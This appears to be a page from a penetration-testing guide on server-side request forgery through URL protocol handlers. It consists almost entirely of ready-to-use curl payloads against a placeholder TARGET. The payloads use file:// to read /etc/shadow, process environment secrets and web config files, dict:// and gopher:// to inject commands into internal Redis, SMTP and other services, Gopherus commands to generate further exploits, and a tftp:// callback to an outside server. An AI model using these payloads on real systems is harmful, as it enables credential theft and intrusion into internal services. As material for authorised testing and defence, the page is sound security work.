Skip to main content

Protocol Handler Exploitation

CWECWE-918
Toolsssrfmap
Difficulty🔴 advanced

Exploit Protocol Handlers​

Many URL parsing libraries support protocols beyond HTTP that can be abused for local file access, service interaction, and arbitrary TCP communication.

file:// -- Local File Read​

# Linux targets
curl "https://TARGET/fetch?url=file:///etc/passwd"
curl "https://TARGET/fetch?url=file:///etc/shadow"
curl "https://TARGET/fetch?url=file:///proc/self/environ"    # Environment variables (secrets)
curl "https://TARGET/fetch?url=file:///proc/self/cmdline"    # Running command
curl "https://TARGET/fetch?url=file:///var/www/html/config.php"

# Windows targets
curl "https://TARGET/fetch?url=file:///C:/Windows/System32/drivers/etc/hosts"
curl "https://TARGET/fetch?url=file:///C:/inetpub/wwwroot/web.config"

dict:// -- Service Interaction​

# Query Redis
curl "https://TARGET/fetch?url=dict://127.0.0.1:6379/INFO"

# Query Memcached
curl "https://TARGET/fetch?url=dict://127.0.0.1:11211/stats"

gopher:// -- Arbitrary TCP Packets​

Gopher is the most powerful protocol for SSRF exploitation. It allows crafting arbitrary TCP packets to attack internal services:

# Redis command injection
PAYLOAD=$(echo -en "SET ssrf_key ssrf_value\r\n" | xxd -p | tr -d '\n')
curl "https://TARGET/fetch?url=gopher://127.0.0.1:6379/_${PAYLOAD}"

# SMTP message sending (demonstrates impact)
SMTP_PAYLOAD=$(cat <<'INNER' | xxd -p | tr -d '\n'
HELO attacker.com
MAIL FROM:<test@test.com>
RCPT TO:<admin@target.com>
DATA
Subject: SSRF PoC

SSRF vulnerability demonstrated.
.
QUIT
INNER
)
curl "https://TARGET/fetch?url=gopher://127.0.0.1:25/_${SMTP_PAYLOAD}"

# Use Gopherus to generate payloads for Redis, MySQL, FastCGI, etc.
gopherus --exploit redis
gopherus --exploit mysql
gopherus --exploit fastcgi

tftp:// -- Out-of-Band Detection​

curl "https://TARGET/fetch?url=tftp://YOUR_SERVER/ssrf-test"